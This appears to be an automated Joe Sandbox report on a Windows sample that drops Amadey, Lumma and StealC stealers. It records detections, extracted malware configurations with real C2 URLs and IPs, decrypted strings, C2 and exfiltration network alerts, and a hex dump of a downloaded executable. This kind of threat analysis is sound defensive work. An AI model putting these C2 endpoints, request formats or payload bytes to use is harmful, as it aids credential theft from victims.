                    2024-11-11T16:36:18.410658+010028033043Unknown Traffic192.168.2.449753185.215.113.20680TCP
                    2024-11-11T16:36:21.943241+010028033043Unknown Traffic192.168.2.449762185.215.113.1680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T16:37:21.951917+010028586661Domain Observed Used for C2 Detected192.168.2.44994023.192.247.89443TCP
                    2024-11-11T16:37:25.004264+010028586661Domain Observed Used for C2 Detected192.168.2.44997123.192.247.89443TCP
                    2024-11-11T16:37:44.784815+010028586661Domain Observed Used for C2 Detected192.168.2.45006623.192.247.89443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: file.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://185.215.113.206/c4becf79229cb002.phpxAvira URL Cloud: Label: malware
                    Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dll-DzAvira URL Cloud: Label: malware
                    Source: http://185.215.113.206/$$Avira URL Cloud: Label: malware
                    Source: http://185.215.113.206/c4becf79229cb002.phpoAvira URL Cloud: Label: malware
                    Source: http://185.215.113.206/c4becf79229cb002.phptAvira URL Cloud: Label: malware
                    Source: http://185.215.113.206/c4becf79229cb002.phpodules;C:Avira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Found malware configuration
                    Source: 00000009.00000002.2044754812.0000000000241000.00000040.00000001.01000000.0000000B.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["presticitpo.store", "thumbystriw.store", "founpiuer.store", "crisiwarny.store", "navygenerayk.store", "scriptyprefej.store", "necklacedmny.store", "fadehairucw.store"], "Build id": "4SD0y4--legendaryy"}
                    Source: file.exe.7352.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeReversingLabs: Detection: 36%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\crypted[1].exeReversingLabs: Detection: 34%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeReversingLabs: Detection: 39%
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeReversingLabs: Detection: 34%
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeReversingLabs: Detection: 39%
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeReversingLabs: Detection: 36%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\crypted[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: file.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: scriptyprefej.store
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: navygenerayk.store
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: founpiuer.store
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: necklacedmny.store
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: thumbystriw.store
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: fadehairucw.store
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: crisiwarny.store
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: presticitpo.store
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: presticitpo.store
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: TeslaBrowser/5.5
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: - Screen Resoluton:
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: - Physical Installed Memory:
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: Workgroup: -
                    Source: 30.2.c61fcc859d.exe.5d0000.0.unpackString decryptor: 4SD0y4--legendaryy
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C73A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,0_2_6C73A9A0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C734440 PK11_PrivDecrypt,0_2_6C734440
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C704420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,0_2_6C704420
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7344C0 PK11_PubEncrypt,0_2_6C7344C0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7825B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,0_2_6C7825B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C718670 PK11_ExportEncryptedPrivKeyInfo,0_2_6C718670
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C73A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,0_2_6C73A650
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C71E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,0_2_6C71E6E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C75A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,0_2_6C75A730
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C760180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,0_2_6C760180
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7343B0 PK11_PubEncryptPKCS1,PR_SetError,0_2_6C7343B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C757C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,0_2_6C757C00
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C717D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,0_2_6C717D60
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C75BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,0_2_6C75BD30
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C759EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,0_2_6C759EC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C733FF0 PK11_PrivDecryptPKCS1,0_2_6C733FF0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C733850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,0_2_6C733850
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C739840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,0_2_6C739840
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C75DA40 SEC_PKCS7ContentIsEncrypted,0_2_6C75DA40
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C733560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,0_2_6C733560
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49750 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49756 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49763 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49764 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49940 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49949 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.4:49946 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49971 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49982 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49988 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50003 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50015 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50028 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50044 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50059 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50061 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:50066 version: TLS 1.2
                    Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1981502028.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr
                    Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr
                    Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr
                    Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: c2bb02869b.exe, 0000001D.00000003.2654071952.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, c2bb02869b.exe, 0000001D.00000002.2787368146.0000000000792000.00000040.00000001.01000000.00000016.sdmp, c2bb02869b.exe, 00000020.00000003.2874392066.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, c2bb02869b.exe, 00000020.00000002.2914600460.0000000000792000.00000040.00000001.01000000.00000016.sdmp
                    Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1981502028.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                    Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
                    Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49730
                    Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
                    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49730
                    Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.206:80
                    Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49829 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49845
                    Source: Network trafficSuricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.4:49887 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49923 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:52667 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:52908 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:56171 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:64664 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:54059 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.4:55994 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.4:56063 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.4:63300 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49963 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50001 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50023 -> 185.215.113.206:80
                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50036 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50060 -> 185.215.113.43:80
                    Source: Network trafficSuricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:59557 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:60370 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:54803 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:62479 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:54401 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.4:62456 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.4:61159 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.4:63228 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50074 -> 185.215.113.206:80
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50092 -> 185.215.113.206:80
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50123 -> 185.215.113.206:80
                    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49940 -> 23.192.247.89:443
                    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49971 -> 23.192.247.89:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49982 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49982 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49988 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49988 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50044 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50061 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:50066 -> 23.192.247.89:443
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
                    Source: Malware configuration extractorURLs: presticitpo.store
                    Source: Malware configuration extractorURLs: thumbystriw.store
                    Source: Malware configuration extractorURLs: founpiuer.store
                    Source: Malware configuration extractorURLs: crisiwarny.store
                    Source: Malware configuration extractorURLs: navygenerayk.store
                    Source: Malware configuration extractorURLs: scriptyprefej.store
                    Source: Malware configuration extractorURLs: necklacedmny.store
                    Source: Malware configuration extractorURLs: fadehairucw.store
                    Source: Malware configuration extractorIPs: 185.215.113.43
                    Tries to resolve many domain names, but no domain seems valid
                    Source: unknownDNS traffic detected: query: tamedgeesy.sbs replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: ducksringjk.sbs replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: explainvees.sbs replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: necklacedmny.store replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: crisiwarny.store replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: thinkyyokej.sbs replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: navygenerayk.store replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: thumbystriw.store replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: terracedjz.cyou replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: founpiuer.store replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: fadehairucw.store replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: scriptyprefej.store replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: repostebhu.sbs replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: rottieud.sbs replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: presticitpo.store replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: brownieyuz.sbs replaycode: Name error (3)
                    Source: unknownDNS traffic detected: query: relalingj.sbs replaycode: Name error (3)
                    Source: global trafficTCP traffic: 192.168.2.4:49964 -> 87.120.125.16:9889
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 15:36:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 